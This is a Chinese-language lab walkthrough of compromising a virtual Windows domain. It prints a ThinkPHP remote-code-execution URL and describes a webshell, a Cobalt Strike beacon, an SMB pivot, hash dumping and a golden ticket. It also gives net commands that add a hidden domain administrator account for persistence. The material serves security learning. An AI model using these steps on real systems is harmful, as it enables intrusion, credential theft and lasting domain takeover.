一、前期准备
有win7和win2008两台虚拟机,其中win7双网卡模拟内外网
win7:
sun\heart 123.com
sun\Administrator dc123.com
2008:
sun\admin 2020.com
IP段设为:192.168.57.x(外网 NAT模式) 192.168.52.x(内网 仅主机模式)
win7:192.168.57.150/24 192.168.52.189/24
2008:192.168.52.190/24
win7需要打开phpstudy

二、外网探测
1.存活主机
发现主机:192.168.57.150
2.端口扫描

发现80端口和3306端口
访问80端口服务
3.ThinkPHP命令执行
发现ThinkPHP框架,同时发现php版本为:5.5.38

尝试thinkphp命令执行
http://192.168.57.150/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

写入webshell,这里直接用工具:https://github.com/Lotus6/ThinkphpGUI/releases/tag/1.3

getshell

成功拿下win7
4.cs上线
上传msf生成的windows木马文件

用msf进行连接,而当我每次连接时,会发现win7会显示:

并且重连了许多次也没连上,考虑用cs试试,用cs生成windows可执行程序,并上传win7

成功上线!
三、内网渗透
1.内网信息收集
查看网络信息

发现内网网段:192.168.52.189
查看所属域

所属域为:sun.com
查看域内主机
net view

查看域控
得到域控IP:192.168.52.190
端口扫描
扫一下端口,先提升到system权限


发现开了445端口
2.横向移动
新建一个beacon_SMB监听器




成功拿下域控机器
3.权限维持
再抓一下域控机器的hash值和明文密码
创建黄金票据

4.添加域管理员
beacon > shell net user syst3m 123qwe.com /add /domain
beacon > shell net user /domain
beacon > shell net group "domain admins" syst3m /add /domain
查看域管理员用户是否添加成功


四、总结
上面建立的域管理员用户以及植入的文件隐蔽性还是不够,后面会对其进行专项学习。学习使用.NET 安全矩阵的工具,再学习一下免杀。